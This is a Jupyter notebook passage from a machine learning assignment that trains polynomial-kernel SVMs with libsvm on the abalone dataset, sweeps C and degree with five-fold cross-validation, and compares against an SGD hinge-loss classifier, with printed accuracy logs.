],
[
[
"import os\nimport numpy as np\nimport pandas as pd",
"_____no_output_____"
],
[
"def preprocess(train_length = 3133):\n pd_tmp = pd.read_csv('abalone.data',header=None)\n sex_map = {'M':(\"1 0 0\"),'F':(\"0 1 0\"),'I':(\"0 0 1\")}\n pd_tmp[0]=pd_tmp[0].apply(lambda x: sex_map[x])\n pd_sex = pd_tmp[0].str.split(expand=True)\n pd_tmp = pd_tmp.drop(columns=[0])\n pd_tmp = pd.concat([pd_sex, pd_tmp], axis=1)\n label_col = np.array(pd_tmp[8])\n new_label = np.ones(len(pd_tmp[8]),dtype=np.float64)\n ind_smaller_than_10 = np.where(label_col<=9)[0]\n new_label[ind_smaller_than_10]= np.float64(-1) # new_label is y_test now\n pd_tmp[8] = new_label\n pd_tmp.columns = range(pd_tmp.shape[1])\n cols = list(pd_tmp.columns)\n cols = [cols[-1]] + cols[:-1]\n pd_tmp = pd_tmp[cols]\n pd_tmp.columns = range(pd_tmp.shape[1])\n cols = list(pd_tmp.columns)\n for cols_name in cols:\n if cols_name != 0:\n pd_tmp[cols_name] = pd_tmp[cols_name].apply(lambda x: str(cols_name)+\":\"+str(x))\n pd_tmp[0] = pd_tmp[0].apply(lambda x: int(x))\n pd_tmp.to_csv('abalone_pre_scale.data',index=False,header=False,sep=\" \")\n train_set = pd_tmp[0:train_length]\n test_set = pd_tmp[train_length:]\n train_set.to_csv('abalone_pre_scale_train.data',index=False,header=False,sep=\" \")\n test_set.to_csv('abalone_pre_scale_test.data',index=False,header=False,sep=\" \")",
"_____no_output_____"
],
[
"preprocess()",
"_____no_output_____"
],
[
"os.system(\"./svm-scale -s scaling_paras/scale_par.txt abalone_pre_scale_train.data > abalone_scaled_train.data\")\nos.system(\"./svm-scale -r scaling_paras/scale_par.txt abalone_pre_scale_test.data > abalone_scaled_test.data\")",
"_____no_output_____"
]
],
[
[
"## Question 3",
"_____no_output_____"
]
],
[
[
"import scipy\nfrom libsvm.svmutil import *",
"_____no_output_____"
],
[
"y, x = svm_read_problem('abalone_scale', return_scipy = True)\n\n# Train & Test split\ntrain_length = 3133\ny_train, x_train = y[0:train_length], x[0:train_length, :]\ny_test, x_test = y[train_length:], x[train_length:, :]\n\n# Transform the train dataset into binary classification problem\nnew_label = np.ones(train_length,dtype=np.float64)\nind_smaller_than_10 = np.where(y_train<=9)[0]\nnew_label[ind_smaller_than_10]= np.float64(0) # new_label is y_test now\n\ntrain_dataset = np.array(list(map(lambda x,y: (x,y), x_train,new_label)))",
"_____no_output_____"
],
[
"# Transform the test dataset into binary classification problem\nnew_label_test = np.ones(len(y)-train_length,dtype=np.float64)\nind_smaller_than_10_test = np.where(y_test<=9)[0]\nnew_label_test[ind_smaller_than_10_test]= np.float64(0) # new_label is y_test now\n\ny_test = new_label_test",
"_____no_output_____"
],
[
"# Generate k-fold split\nk = 5\nlst_k_fold_dataset = []\nnp.random.shuffle(train_dataset)\nind_increment = int(np.floor(len(train_dataset)/k))\n\nstart_ind = 0\nend_ind = ind_increment\nfor i in range(k):\n lst_k_fold_dataset.append(train_dataset[start_ind:end_ind])\n start_ind += ind_increment\n end_ind += ind_increment",
"_____no_output_____"
],
[
"ploy_degree_lst = [1, 2, 3, 4, 5]\nk_val_sup = 9\nkernel_type = \"1\"",
"_____no_output_____"
],
[
"lst_acc_ploy_degree = []\n\nfor ploy_degree in ploy_degree_lst:\n lst_acc_k_val = []\n for k_val in range(-k_val_sup, k_val_sup): # C = -3k to 3k\n lst_cross_validation_acc = []\n for ind, train_set in enumerate(lst_k_fold_dataset):\n X_test_tmp = train_set[:,0]\n y_test_tmp = train_set[:,1]\n \n X_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,0]\n y_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,1]\n \n m = svm_train(y_tmp, scipy.sparse.vstack(X_tmp),\"-c %s -t %s -d %s -q\" % (3**k_val, kernel_type, ploy_degree))\n p_label, p_acc, p_val = svm_predict(y_test_tmp, scipy.sparse.vstack(X_test_tmp), m)\n \n lst_cross_validation_acc.append(p_acc[1])\n \n p_acc_cross_validated = np.mean(lst_cross_validation_acc)\n lst_acc_k_val.append(lst_cross_validation_acc)\n print(f\"Poly_Degree: {ploy_degree} | k: {k_val} | p_error_cross_validated is {p_acc_cross_validated}\")\n \n lst_acc_ploy_degree.append(lst_acc_k_val) ",
"Accuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -9 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -8 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -7 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 1 | k: -6 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 70.7668% (443/626) (classification)\nAccuracy = 70.607% (442/626) (classification)\nAccuracy = 71.5655% (448/626) (classification)\nAccuracy = 70.1278% (439/626) (classification)\nAccuracy = 73.0032% (457/626) (classification)\nPoly_Degree: 1 | k: -5 | p_error_cross_validated is 0.2878594249201278\nAccuracy = 71.246% (446/626) (classification)\nAccuracy = 72.524% (454/626) (classification)\nAccuracy = 72.524% (454/626) (classification)\nAccuracy = 68.8498% (431/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nPoly_Degree: 1 | k: -4 | p_error_cross_validated is 0.2843450479233227\nAccuracy = 71.7252% (449/626) (classification)\nAccuracy = 73.1629% (458/626) (classification)\nAccuracy = 73.6422% (461/626) (classification)\nAccuracy = 70.4473% (441/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nPoly_Degree: 1 | k: -3 | p_error_cross_validated is 0.2766773162939297\nAccuracy = 72.6837% (455/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nAccuracy = 74.7604% (468/626) (classification)\nAccuracy = 71.7252% (449/626) (classification)\nAccuracy = 73.8019% (462/626) (classification)\nPoly_Degree: 1 | k: -2 | p_error_cross_validated is 0.2686900958466454\nAccuracy = 73.3227% (459/626) (classification)\nAccuracy = 73.3227% (459/626) (classification)\nAccuracy = 76.0383% (476/626) (classification)\nAccuracy = 72.0447% (451/626) (classification)\nAccuracy = 76.0383% (476/626) (classification)\nPoly_Degree: 1 | k: -1 | p_error_cross_validated is 0.2584664536741214\nAccuracy = 74.7604% (468/626) (classification)\nAccuracy = 74.9201% (469/626) (classification)\nAccuracy = 78.754% (493/626) (classification)\nAccuracy = 75.0799% (470/626) (classification)\nAccuracy = 78.754% (493/626) (classification)\nPoly_Degree: 1 | k: 0 | p_error_cross_validated is 0.2354632587859425\nAccuracy = 77.6358% (486/626) (classification)\nAccuracy = 77.476% (485/626) (classification)\nAccuracy = 79.8722% (500/626) (classification)\nAccuracy = 75.3994% (472/626) (classification)\nAccuracy = 80.9904% (507/626) (classification)\nPoly_Degree: 1 | k: 1 | p_error_cross_validated is 0.2172523961661342\nAccuracy = 78.754% (493/626) (classification)\nAccuracy = 78.4345% (491/626) (classification)\nAccuracy = 80.3514% (503/626) 
(classification)\nAccuracy = 75.0799% (470/626) (classification)\nAccuracy = 83.2268% (521/626) (classification)\nPoly_Degree: 1 | k: 2 | p_error_cross_validated is 0.20830670926517572\nAccuracy = 79.393% (497/626) (classification)\nAccuracy = 78.2748% (490/626) (classification)\nAccuracy = 79.8722% (500/626) (classification)\nAccuracy = 74.9201% (469/626) (classification)\nAccuracy = 83.0671% (520/626) (classification)\nPoly_Degree: 1 | k: 3 | p_error_cross_validated is 0.20894568690095844\nAccuracy = 79.7125% (499/626) (classification)\nAccuracy = 78.2748% (490/626) (classification)\nAccuracy = 80.1917% (502/626) (classification)\nAccuracy = 75.2396% (471/626) (classification)\nAccuracy = 83.2268% (521/626) (classification)\nPoly_Degree: 1 | k: 4 | p_error_cross_validated is 0.20670926517571883\nAccuracy = 79.7125% (499/626) (classification)\nAccuracy = 77.9553% (488/626) (classification)\nAccuracy = 80.9904% (507/626) (classification)\nAccuracy = 75.3994% (472/626) (classification)\nAccuracy = 83.5463% (523/626) (classification)\nPoly_Degree: 1 | k: 5 | p_error_cross_validated is 0.2047923322683706\nAccuracy = 80.0319% (501/626) (classification)\nAccuracy = 77.7955% (487/626) (classification)\nAccuracy = 80.8307% (506/626) (classification)\nAccuracy = 75.2396% (471/626) (classification)\nAccuracy = 83.7061% (524/626) (classification)\nPoly_Degree: 1 | k: 6 | p_error_cross_validated is 0.2047923322683706\nAccuracy = 80.0319% (501/626) (classification)\nAccuracy = 77.6358% (486/626) (classification)\nAccuracy = 80.8307% (506/626) (classification)\nAccuracy = 75.5591% (473/626) (classification)\nAccuracy = 83.8658% (525/626) (classification)\nPoly_Degree: 1 | k: 7 | p_error_cross_validated is 0.20415335463258785\nAccuracy = 80.0319% (501/626) (classification)\nAccuracy = 77.6358% (486/626) (classification)\nAccuracy = 80.9904% (507/626) (classification)\nAccuracy = 75.3994% (472/626) (classification)\nAccuracy = 84.0256% (526/626) (classification)\nPoly_Degree: 1 | k: 8 | p_error_cross_validated is 0.20383386581469648\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -9 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -8 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -7 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 53.6741% (336/626) (classification)\nPoly_Degree: 2 | k: -6 | p_error_cross_validated is 0.49009584664536743\nAccuracy = 50.1597% (314/626) (classification)\nAccuracy = 49.8403% (312/626) (classification)\nAccuracy = 51.5974% (323/626) (classification)\nAccuracy = 49.6805% (311/626) (classification)\nAccuracy = 54.6326% (342/626) 
(classification)\nPoly_Degree: 2 | k: -5 | p_error_cross_validated is 0.48817891373801914\nAccuracy = 72.8435% (456/626) (classification)\nAccuracy = 72.6837% (455/626) (classification)\nAccuracy = 72.524% (454/626) (classification)\nAccuracy = 69.9681% (438/626) (classification)\nAccuracy = 71.0863% (445/626) (classification)\nPoly_Degree: 2 | k: -4 | p_error_cross_validated is 0.2817891373801916\nAccuracy = 73.6422% (461/626) (classification)\nAccuracy = 73.3227% (459/626) (classification)\nAccuracy = 74.4409% (466/626) (classification)\nAccuracy = 69.6486% (436/626) (classification)\nAccuracy = 74.4409% (466/626) (classification)\nPoly_Degree: 2 | k: -3 | p_error_cross_validated is 0.2690095846645367\nAccuracy = 73.6422% (461/626) (classification)\nAccuracy = 72.8435% (456/626) (classification)\nAccuracy = 75.0799% (470/626) (classification)\nAccuracy = 71.4058% (447/626) (classification)\nAccuracy = 74.9201% (469/626) (classification)\nPoly_Degree: 2 | k: -2 | p_error_cross_validated is 0.2642172523961661\nAccuracy = 73.9617% (463/626) (classification)\nAccuracy = 73.9617% (463/626) (classification)\nAccuracy = 75.2396% (471/626) (classification)\nAccuracy = 71.7252% (449/626) (classification)\nAccuracy = 76.1981% (477/626) (classification)\nPoly_Degree: 2 | k: -1 | p_error_cross_validated is 0.25782747603833867\nAccuracy = 74.1214% (464/626) (classification)\n"
],
[
"import matplotlib.pyplot as plt\nimport math\n\nlst_cross_validated_error = []\nfor i in range(len(lst_acc_ploy_degree)):\n plt.figure()\n mean_val_lst = list(map(lambda x: np.mean(x), lst_acc_ploy_degree[i]))\n std_val_lst = list(map(lambda x: np.std(x), lst_acc_ploy_degree[i]))\n lst_cross_validated_error.append(mean_val_lst)\n\n plt.plot([math.log(3**k_val,3) for k_val in range(-k_val_sup, k_val_sup)],mean_val_lst, label=\"mean\")\n plt.plot([math.log(3**k_val,3) for k_val in range(-k_val_sup, k_val_sup)],np.add(mean_val_lst,std_val_lst))#, label=\"mean\")\n plt.plot([math.log(3**k_val,3) for k_val in range(-k_val_sup, k_val_sup)],np.subtract(mean_val_lst,std_val_lst))#, label=\"mean\")\n\n plt.title(f\"d={ploy_degree_lst[i]}\")\n plt.xlabel(\"The value of k in C=3^k\")\n plt.ylabel(\"Cross Validation Error\")\n plt.legend()\n ",
"_____no_output_____"
]
],
[
[
"## Question 4",
"_____no_output_____"
]
],
[
[
"argmin_ind = np.unravel_index(np.argmin(np.array(lst_cross_validated_error)), np.array(lst_cross_validated_error).shape)\nk_lst = [i for i in range(-k_val_sup,k_val_sup)]\nbest_d = ploy_degree_lst[argmin_ind[0]]\nbest_k = k_lst[argmin_ind[1]]\nbest_C = 3**(k_lst[argmin_ind[1]])\nprint(f\"The minimum cross validation error is {np.min(np.array(lst_cross_validated_error))}\")\nprint(f\"The index of the minimum cross validation error is {argmin_ind}\")\nprint(f\"The best C: {best_C} | The best d: {best_d}\")",
"The minimum cross validation error is 0.19297124600638976\nThe index of the minimum cross validation error is (2, 15)\nThe best C: 729 | The best d: 3\n"
],
[
"# Calculate test error\nsv_lst = []\nlst_test_error = []\nfor i in range(len(ploy_degree_lst)):\n best_m = svm_train(new_label, x_train,\"-c %s -t %s -d %s -q\" % (best_C, kernel_type, ploy_degree_lst[i]))\n p_label, p_acc, p_val = svm_predict(y_test, x_test, best_m)\n lst_test_error.append(p_acc[1])\n sv_lst.append(best_m.get_nr_sv())\n",
"Accuracy = 77.1073% (805/1044) (classification)\nAccuracy = 78.9272% (824/1044) (classification)\nAccuracy = 78.4483% (819/1044) (classification)\nAccuracy = 78.6398% (821/1044) (classification)\nAccuracy = 79.5977% (831/1044) (classification)\n"
],
[
"lst_cross_err_for_best_C = []\n\nfor i in range(len(ploy_degree_lst)):\n ind_C = np.where(np.array(k_lst)==best_k)[0][0]\n cross_err = lst_acc_ploy_degree[i][ind_C]\n \n mean_cross_err = np.mean(cross_err)\n std_cross_err = np.std(cross_err)\n \n lst_cross_err_for_best_C.append([mean_cross_err,std_cross_err])\n \n# Cross Validation Error\nplt.figure()\nplt.plot(ploy_degree_lst,np.array(lst_cross_err_for_best_C)[:,0],label = \"mean\")\nplt.plot(ploy_degree_lst,np.add(np.array(lst_cross_err_for_best_C)[:,0], np.array(lst_cross_err_for_best_C)[:,1]))\nplt.plot(ploy_degree_lst,np.subtract(np.array(lst_cross_err_for_best_C)[:,0], np.array(lst_cross_err_for_best_C)[:,1]))\nplt.legend()\nplt.xlabel(\"The polynomial degress\")\nplt.ylabel(\"Cross Validation Errors\")\nplt.title(\"Cross Validation Error for the best C=C^*\")\n\n# Test Error\nplt.figure()\nplt.plot(ploy_degree_lst, lst_test_error)\nplt.xlabel(\"The polynomial degress\")\nplt.ylabel(\"Test Errors\")\nplt.title(\"Test Error for the best C=C^*\")",
"_____no_output_____"
],
[
"# Numbers of support vectors\nplt.figure()\nplt.plot(ploy_degree_lst, sv_lst)\nplt.xlabel(\"The polynomial degress\")\nplt.ylabel(\"Numbers of support vectors\")\nplt.title(\"Numbers of support vectors for the best C=C^*\")",
"_____no_output_____"
]
],
[
[
"## Question 5",
"_____no_output_____"
]
],
[
[
"lst_train_err = []\nlst_test_err = []\n\nfor num_exs in range(1,train_length,500):\n best_m = svm_train(new_label[:num_exs], x_train[:num_exs],\"-c %s -t %s -d %s -q\" % (best_C, kernel_type, best_d))\n \n p_label, p_acc_train, p_val = svm_predict(new_label[:num_exs], x_train[:num_exs], best_m)\n p_label, p_acc_test, p_val = svm_predict(y_test, x_test, best_m)\n \n lst_train_err.append(p_acc_train[1])\n lst_test_err.append(p_acc_test[1])",
"Accuracy = 100% (1/1) (classification)\nAccuracy = 52.2989% (546/1044) (classification)\nAccuracy = 87.2255% (437/501) (classification)\nAccuracy = 72.4138% (756/1044) (classification)\nAccuracy = 83.6164% (837/1001) (classification)\nAccuracy = 74.8084% (781/1044) (classification)\nAccuracy = 82.545% (1239/1501) (classification)\nAccuracy = 79.6935% (832/1044) (classification)\nAccuracy = 81.3093% (1627/2001) (classification)\nAccuracy = 78.9272% (824/1044) (classification)\nAccuracy = 81.6074% (2041/2501) (classification)\nAccuracy = 79.4061% (829/1044) (classification)\nAccuracy = 81.7727% (2454/3001) (classification)\nAccuracy = 78.2567% (817/1044) (classification)\n"
],
[
"plt.figure()\nplt.plot([num_exs for num_exs in range(1,train_length,500)], lst_train_err, label=\"train error\")\nplt.plot([num_exs for num_exs in range(1,train_length,500)], lst_test_err, label=\"test error\")\nplt.legend()\nplt.xlabel(\"Numbers of training examples\")\nplt.ylabel(\"Error\")\nplt.title(\"The training and test errors at best C and best d\")",
"_____no_output_____"
]
],
[
[
"## Question 6 c)\n\nFor the hinge loss minimization problem of SVM, we consider the sklearn library implementation.\n\nBy sklearn documentation, the `SGDClassifier` trained with the hinge loss using Stochastic Gradient Descent is equivalent to a linear SVM.",
"_____no_output_____"
]
],
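One way to illustrate that equivalence on this dataset is to fit both estimators on the same training split and compare test accuracies. This is a hedged sketch rather than part of the original assignment: it reuses `x_train`, `new_label`, `x_test`, and `y_test` from the cells above, and the two scores will not match exactly because `SGDClassifier` is stochastic and parameterizes regularization differently from `LinearSVC`.

```python
from sklearn.linear_model import SGDClassifier
from sklearn.metrics import accuracy_score
from sklearn.svm import LinearSVC

# both estimators accept the scipy sparse matrices produced by svm_read_problem
svc = LinearSVC(max_iter=10000).fit(x_train, new_label)
sgd = SGDClassifier(loss="hinge").fit(x_train, new_label)

print("LinearSVC test accuracy :", accuracy_score(y_test, svc.predict(x_test)))
print("SGD hinge test accuracy :", accuracy_score(y_test, sgd.predict(x_test)))
```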
[
[
"from sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import SGDClassifier",
"_____no_output_____"
],
[
"clf = SGDClassifier(loss=\"hinge\")",
"_____no_output_____"
],
[
"# Test Error\nclf.fit(x_train, new_label)\npred_svm_test = clf.predict(x_test)\nsvm_hinge_acc_Test = accuracy_score(y_test,pred_svm_test)",
"_____no_output_____"
],
[
"# Five-Folds cross validation error\nlst_svm_hinge_cross_validation_acc = []\n\nfor ind, train_set in enumerate(lst_k_fold_dataset):\n X_test_tmp = train_set[:,0]\n y_test_tmp = train_set[:,1]\n\n X_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,0]\n y_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,1]\n \n clf.fit(scipy.sparse.vstack(X_tmp),np.array(y_tmp,dtype='float'))\n pred_svm_hinge = clf.predict(scipy.sparse.vstack(X_test_tmp))\n svm_hinge_acc = accuracy_score(np.array(y_test_tmp,dtype='float'),pred_svm_hinge)\n \n lst_svm_hinge_cross_validation_acc.append(svm_hinge_acc)",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\n\nplt.figure()\nplt.scatter([1,2,3,4,5],[svm_hinge_acc_Test]*5,label=\"Test\")\nplt.scatter([1,2,3,4,5],[1-i for i in lst_svm_hinge_cross_validation_acc], label=\"Five Folds\")\nplt.xlabel(\"Trial numbers\")\nplt.ylabel(\"Cross Validation Error\")\nplt.legend()\nplt.title(\"Five Fold Cross Validation Error for SVM with Hinge Loss trained using SGD\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb0275f643d3ff4f2fddc51a416ce0f4750257a7 | 41,014 | ipynb | Jupyter Notebook | examples/classification/ABIDE_classification.ipynb | FL33TW00D/rustyDTW | 37ab548c34e041d969083ac1f1ae84d3d941c014 | [
"MIT"
] | 9 | 2021-06-24T07:04:22.000Z | 2022-03-28T15:24:29.000Z | examples/classification/ABIDE_classification.ipynb | FL33TW00D/rustyDTW | 37ab548c34e041d969083ac1f1ae84d3d941c014 | [
"MIT"
] | null | null | null | examples/classification/ABIDE_classification.ipynb | FL33TW00D/rustyDTW | 37ab548c34e041d969083ac1f1ae84d3d941c014 | [
"MIT"
] | 1 | 2021-06-24T03:48:46.000Z | 2021-06-24T03:48:46.000Z | 135.359736 | 32,116 | 0.870581 | [
[
[
"#Modified version of the following script from nilearn: \n#https://nilearn.github.io/auto_examples/03_connectivity/plot_group_level_connectivity.html\nfrom nilearn import datasets\nfrom tqdm.notebook import tqdm\n\nabide_dataset = datasets.fetch_abide_pcp(n_subjects=200)",
"/home/fleetwood/miniconda3/lib/python3.6/site-packages/numpy/lib/npyio.py:2349: VisibleDeprecationWarning: Reading unicode strings without specifying the encoding argument is deprecated. Set the encoding, use None for the system default.\n output = genfromtxt(fname, **kwargs)\n"
],
[
"abide_dataset.keys()",
"_____no_output_____"
],
[
"from nilearn import input_data\n\nmsdl_data = datasets.fetch_atlas_msdl()\nmasker = input_data.NiftiMapsMasker(\n msdl_data.maps, resampling_target=\"data\", t_r=2, detrend=True,\n low_pass=.1, high_pass=.01, memory='nilearn_cache', memory_level=1).fit()",
"_____no_output_____"
],
[
"pooled_subjects = []\ngroups = []\nfor func_file, dx in tqdm(zip(abide_dataset['func_preproc'], abide_dataset['phenotypic']['DX_GROUP'])):\n time_series = masker.transform(func_file)\n pooled_subjects.append(time_series)\n groups.append(dx)\n\nprint(f'Dataset has {len(pooled_subjects)} subjects')",
"_____no_output_____"
],
[
"n_regions = pooled_subjects[0].shape[1]",
"_____no_output_____"
],
[
"def sym_matrix_to_vec(symmetric):\n tril_mask = np.tril(np.ones(symmetric.shape[-2:]), k=-1).astype(np.bool)\n return symmetric[..., tril_mask]",
"_____no_output_____"
],
[
"def compute_dtw(subjects, n_regions):\n dtw_output = []\n for subj in subjects:\n dtw_output.append(\n rust_dtw.dtw_connectome(\n connectome=subj,\n window=100, \n distance_mode=\"euclidean\")\n )\n connectomes = []\n #Post processing them as per paper recommendations\n for vec in dtw_output:\n sym = np.zeros((n_regions, n_regions))\n sym[i_lower] = vec\n sym += sym.T\n sym *= -1\n StandardScaler().fit_transform(sym)\n connectomes.append(sym_matrix_to_vec(sym))\n return connectomes",
"_____no_output_____"
],
[
"from sklearn.svm import LinearSVC\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import accuracy_score\nfrom nilearn.connectome import ConnectivityMeasure\nimport matplotlib.pyplot as plt\nimport rust_dtw\nimport numpy as np\nimport copy\n\nkinds = ['dtw', 'correlation', 'partial correlation', 'tangent']\n# kinds = ['correlation']\n_, classes = np.unique(groups, return_inverse=True)\ncv = StratifiedShuffleSplit(n_splits=15, random_state=0, test_size=5)\npooled_subjects = np.asarray(pooled_subjects)\n\nscores = {}\nfor kind in kinds:\n print('PROCESSING: ', kind)\n scores[kind] = []\n for train, test in cv.split(pooled_subjects, classes):\n if kind == 'dtw': \n connectomes = compute_dtw(pooled_subjects[train], n_regions)\n test_connectomes = compute_dtw(pooled_subjects[test], n_regions)\n else:\n connectivity = ConnectivityMeasure(kind=kind, vectorize=True)\n connectomes = connectivity.fit_transform(pooled_subjects[train])\n test_connectomes = connectivity.transform(pooled_subjects[test])\n \n classifier = LinearSVC(max_iter=10000).fit(connectomes, classes[train])\n # make predictions for the left-out test subjects\n predictions = classifier.predict(test_connectomes)\n \n # store the accuracy for this cross-validation fold\n scores[kind].append(accuracy_score(classes[test], predictions))",
"PROCESSING: dtw\n"
],
[
"import matplotlib.pyplot as plt\nimport seaborn\nplt.style.use('seaborn-white')\nseaborn.set_context('poster')\nmean_scores = [np.mean(scores[kind]) for kind in kinds]\nprint(list(zip(mean_scores, kinds) ))\nscores_std = [np.std(scores[kind]) for kind in kinds]\n\nplt.figure(figsize=(15, 10))\npositions = np.arange(len(kinds)) * .1 + .1\nplt.barh(positions, mean_scores, align='center', height=.05, xerr=scores_std)\nyticks = [k.replace(' ', '\\n') for k in kinds]\nplt.yticks(positions, yticks)\nplt.gca().grid(True)\nplt.gca().set_axisbelow(True)\nplt.xlabel('Classification accuracy')\nplt.tight_layout()\nplt.savefig('accuracy.png', bbox_inches=\"tight\", dpi=300)",
"[(0.6933333333333332, 'dtw'), (0.6400000000000001, 'correlation'), (0.6133333333333334, 'partial correlation'), (0.6933333333333332, 'tangent')]\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0284482a822310205e9ac9f85bbb72a3bd46a2 | 16,095 | ipynb | Jupyter Notebook | probabilitymassfunction.ipynb | hasanburakaydin/Plugins | 73ddbf3b6ab145869d657b8d124fe444c8f61dfe | [
"MIT"
] | null | null | null | probabilitymassfunction.ipynb | hasanburakaydin/Plugins | 73ddbf3b6ab145869d657b8d124fe444c8f61dfe | [
"MIT"
] | null | null | null | probabilitymassfunction.ipynb | hasanburakaydin/Plugins | 73ddbf3b6ab145869d657b8d124fe444c8f61dfe | [
"MIT"
] | null | null | null | 145 | 12,790 | 0.875241 | [
[
[
"<a href=\"https://colab.research.google.com/github/hasanburakaydin/Plugins/blob/master/probabilitymassfunction.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"Faruk ve Talha isimli öğrencilerden **birini** seçeceğiz.\n* Faruk’u seçme olasılığımız **P(F) = 0.6**,\n* Talha’yı seçme olasılığımız **P(T) = 0.4** olsun. \n* Bu durumu **bernoulli** diyagramı ile gösterebiliriz.\n* **Bernoulli ayrık rassal değişkenler**den oluşan bir diyagramdır.\n* Bu yüzden **Olasılık kütle fonksiyonu (PMF)**‘yi kullanmalıyız.",
"_____no_output_____"
]
],
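As a small illustrative addition (not part of the original exercise), the mean and variance of this Bernoulli variable can be checked against the closed-form results E[X] = p and Var[X] = p(1 - p) using `scipy.stats.bernoulli.stats`:

```python
from scipy.stats import bernoulli

p = 0.6  # probability of selecting Faruk, as defined above
mean, var = bernoulli.stats(p, moments='mv')

print(mean, "==", p)           # E[X] = p = 0.6
print(var, "==", p * (1 - p))  # Var[X] = p(1-p) = 0.24
```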
[
[
"## 205112015 Hasan Burak AYDIN Olasılık Kütle Fonksiyonu (PMF) Çalışması\n\nfrom scipy.stats import bernoulli #bernoulli kütle yoğunluk fonksiyonunun plot diyagramı için kütüphanelerin dahil edilmesi\nimport matplotlib.pyplot as plt\n\nX = [0,1] #X rassal değişkenimizin aldığı değerlerin diziye atanması\npF = 0.6 #Faruk'u seçme olasılığının pF değişkenine atanması\nplt.bar(X,bernoulli.pmf(X,pF),width=0.1,color=[\"r\",\"b\"]) #bernoulli kütle yoğunluk fonksiyonunun plot diyagramının çizilmesi\nplt.title(\"OLASILIK KÜTLE FONKSİYONU\")\nplt.xlabel(\"X RASSAL DEĞİŞKENİNİN DEĞERLERİ\")\nplt.ylabel(\"OLAYIN GERÇEKLEŞMESİ OLASILIĞI\")\n\n\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb028b2617c31c25b488712c71895c846a3ac269 | 130,702 | ipynb | Jupyter Notebook | Recommendations_with_IBM.ipynb | MihaiLai/Recommendation-System | 7bdb9964a818d3e279847a7e41a18a8e2cacbbb6 | [
"MIT"
] | null | null | null | Recommendations_with_IBM.ipynb | MihaiLai/Recommendation-System | 7bdb9964a818d3e279847a7e41a18a8e2cacbbb6 | [
"MIT"
] | null | null | null | Recommendations_with_IBM.ipynb | MihaiLai/Recommendation-System | 7bdb9964a818d3e279847a7e41a18a8e2cacbbb6 | [
"MIT"
] | null | null | null | 59.790485 | 20,060 | 0.683333 | [
[
[
